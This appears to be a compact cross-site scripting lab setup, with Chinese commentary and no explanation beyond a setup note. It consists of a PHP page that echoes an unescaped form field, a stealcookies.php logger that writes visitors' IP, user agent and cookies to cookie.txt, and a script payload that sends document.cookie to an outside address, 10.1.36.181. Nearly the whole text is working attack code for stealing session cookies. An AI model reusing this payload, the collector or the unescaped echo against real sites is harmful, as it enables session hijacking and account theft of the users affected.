<?php session_start();
session_regenerate_id(); echo session_id()."<br/>";
if(isset($_POST["login"])) { echo "Hello " .$_POST["name"]."<br/>"; } ?>
<html> <body> <form id ="form1" name="form1" method="post" action="victim.php"> <label>Name <input name="name" type="text" id="name"/> </label> <input name="login" type="submit" id="login" value="submit"/> </form> </body> </html>
脚本运行的前提条件,在stealcookies.php同一根目录下,有一个有写权限的文件 cookie.txt<?php $ua = $_SERVER["HTTP_USER_AGENT"]; $client_ip = $_SERVER["REMOTE_ADDR"]; $method = $_SERVER["REQUEST_METHOD"]; $referer = $_SERVER["HTTP_REFERER"]; $date = date("F j, Y, g:i a"); $querystring = $_SERVER["QUERY_STRING"]; $log = fopen("cookie.txt","a+"); $str= "IP: $client_ip |Useragent: $ua | Method: $method | REF: $referer | Date: $date | Cookie: $querystring \n"; fwrite($log,$str); ?>
<script>document.write('<img src="http://10.1.36.181/stealcookies.php?a=' + encodeURI(document.cookie) + '"/>')</script>
cat cookie.txt